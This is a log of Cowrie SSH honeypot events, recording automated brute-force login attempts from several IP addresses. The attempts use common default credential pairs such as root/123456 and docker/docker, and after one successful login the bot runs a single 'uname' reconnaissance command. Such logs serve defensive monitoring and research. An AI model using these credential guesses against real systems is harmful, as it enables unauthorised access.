{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T09:11:07.506221Z","src_ip":"212.227.235.229","session":"07c6804ee6cb"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:11:08.265109Z","src_ip":"212.227.235.229","session":"07c6804ee6cb"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:11:09.518081Z","src_ip":"212.227.235.229","session":"07c6804ee6cb"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":50084,"dst_ip":"1.2.3.4","dst_port":22,"session":"04157d7151ac","protocol":"ssh","message":"New connection: 185.93.89.7:50084 (1.2.3.4:22) [session: 04157d7151ac]","sensor":"my-vps","timestamp":"2025-08-28T09:11:10.523170Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:11:10.529073Z","src_ip":"185.93.89.7","session":"04157d7151ac"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:11:10.544851Z","src_ip":"185.93.89.7","session":"04157d7151ac"}
{"eventid":"cowrie.login.failed","username":"index","password":"1234567890","message":"login attempt [index/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-28T09:11:10.595086Z","src_ip":"185.93.89.7","session":"04157d7151ac"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:11:11.708552Z","src_ip":"185.93.89.7","session":"04157d7151ac"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":44210,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b2d9e524292","protocol":"ssh","message":"New connection: 51.79.164.132:44210 (1.2.3.4:22) [session: 4b2d9e524292]","sensor":"my-vps","timestamp":"2025-08-28T09:11:24.068721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:11:24.159545Z","src_ip":"51.79.164.132","session":"4b2d9e524292"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:11:24.640996Z","src_ip":"51.79.164.132","session":"4b2d9e524292"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker","message":"login attempt [docker/docker] failed","sensor":"my-vps","timestamp":"2025-08-28T09:11:25.765020Z","src_ip":"51.79.164.132","session":"4b2d9e524292"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:11:27.532809Z","src_ip":"51.79.164.132","session":"4b2d9e524292"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57356,"dst_ip":"1.2.3.4","dst_port":22,"session":"381434476305","protocol":"ssh","message":"New connection: 212.227.235.229:57356 (1.2.3.4:22) [session: 381434476305]","sensor":"my-vps","timestamp":"2025-08-28T09:11:29.776575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:11:29.779437Z","src_ip":"212.227.235.229","session":"381434476305"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T09:11:30.029703Z","src_ip":"212.227.235.229","session":"381434476305"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:11:31.046760Z","src_ip":"212.227.235.229","session":"381434476305"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:11:31.569472Z","src_ip":"212.227.235.229","session":"381434476305"}
{"eventid":"cowrie.command.input","input":"uname -s -m","message":"CMD: uname -s -m","sensor":"my-vps","timestamp":"2025-08-28T09:11:31.570180Z","src_ip":"212.227.235.229","session":"381434476305"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","size":13,"shasum":"6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:11:31.823942Z","src_ip":"212.227.235.229","session":"381434476305"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:11:31.825083Z","src_ip":"212.227.235.229","session":"381434476305"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":54028,"dst_ip":"1.2.3.4","dst_port":22,"session":"2445a21d41ca","protocol":"ssh","message":"New connection: 185.93.89.7:54028 (1.2.3.4:22) [session: 2445a21d41ca]","sensor":"my-vps","timestamp":"2025-08-28T09:11:34.866481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:11:34.867497Z","src_ip":"185.93.89.7","session":"2445a21d41ca"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:11:34.886414Z","src_ip":"185.93.89.7","session":"2445a21d41ca"}
{"eventid":"cowrie.login.failed","username":"index","password":"000000","message":"login attempt [index/000000] failed","sensor":"my-vps","timestamp":"2025-08-28T09:11:34.925183Z","src_ip":"185.93.89.7","session":"2445a21d41ca"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:11:35.966489Z","src_ip":"185.93.89.7","session":"2445a21d41ca"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":52876,"dst_ip":"1.2.3.4","dst_port":22,"session":"6541ff38eacb","protocol":"ssh","message":"New connection: 51.79.164.132:52876 (1.2.3.4:22) [session: 6541ff38eacb]","sensor":"my-vps","timestamp":"2025-08-28T09:11:49.898608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:11:50.004168Z","src_ip":"51.79.164.132","session":"6541ff38eacb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:11:50.382439Z","src_ip":"51.79.164.132","session":"6541ff38eacb"}
{"eventid":"cowrie.login.failed","username":"user","password":"1","message":"login attempt [user/1] failed","sensor":"my-vps","timestamp":"2025-08-28T09:11:51.743511Z","src_ip":"51.79.164.132","session":"6541ff38eacb"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:11:53.390082Z","src_ip":"51.79.164.132","session":"6541ff38eacb"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":58494,"dst_ip":"1.2.3.4","dst_port":22,"session":"73a888df436e","protocol":"ssh","message":"New connection: 185.93.89.7:58494 (1.2.3.4:22) [session: 73a888df436e]","sensor":"my-vps","timestamp":"2025-08-28T09:11:59.157180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:11:59.158089Z","src_ip":"185.93.89.7","session":"73a888df436e"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:11:59.191080Z","src_ip":"185.93.89.7","session":"73a888df436e"}
{"eventid":"cowrie.login.failed","username":"index","password":"666666","message":"login attempt [index/666666] failed","sensor":"my-vps","timestamp":"2025-08-28T09:11:59.231072Z","src_ip":"185.93.89.7","session":"73a888df436e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:12:00.254311Z","src_ip":"185.93.89.7","session":"73a888df436e"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":34624,"dst_ip":"1.2.3.4","dst_port":22,"session":"291c36288249","protocol":"ssh","message":"New connection: 51.79.164.132:34624 (1.2.3.4:22) [session: 291c36288249]","sensor":"my-vps","timestamp":"2025-08-28T09:12:16.569490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:12:16.614339Z","src_ip":"51.79.164.132","session":"291c36288249"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:12:16.999240Z","src_ip":"51.79.164.132","session":"291c36288249"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic","message":"login attempt [elastic/elastic] failed","sensor":"my-vps","timestamp":"2025-08-28T09:12:18.496024Z","src_ip":"51.79.164.132","session":"291c36288249"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:12:20.115856Z","src_ip":"51.79.164.132","session":"291c36288249"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":51752,"dst_ip":"1.2.3.4","dst_port":22,"session":"8529aa2bc31a","protocol":"ssh","message":"New connection: 185.93.89.7:51752 (1.2.3.4:22) [session: 8529aa2bc31a]","sensor":"my-vps","timestamp":"2025-08-28T09:12:23.420237Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:12:23.420906Z","src_ip":"185.93.89.7","session":"8529aa2bc31a"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:12:23.438742Z","src_ip":"185.93.89.7","session":"8529aa2bc31a"}
{"eventid":"cowrie.login.failed","username":"index","password":"1qaz2wsx","message":"login attempt [index/1qaz2wsx] failed","sensor":"my-vps","timestamp":"2025-08-28T09:12:23.475851Z","src_ip":"185.93.89.7","session":"8529aa2bc31a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:12:24.495306Z","src_ip":"185.93.89.7","session":"8529aa2bc31a"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":6308,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7cd5657e99a","protocol":"ssh","message":"New connection: 80.94.95.15:6308 (1.2.3.4:22) [session: f7cd5657e99a]","sensor":"my-vps","timestamp":"2025-08-28T09:12:24.657010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T09:12:24.657799Z","src_ip":"80.94.95.15","session":"f7cd5657e99a"}
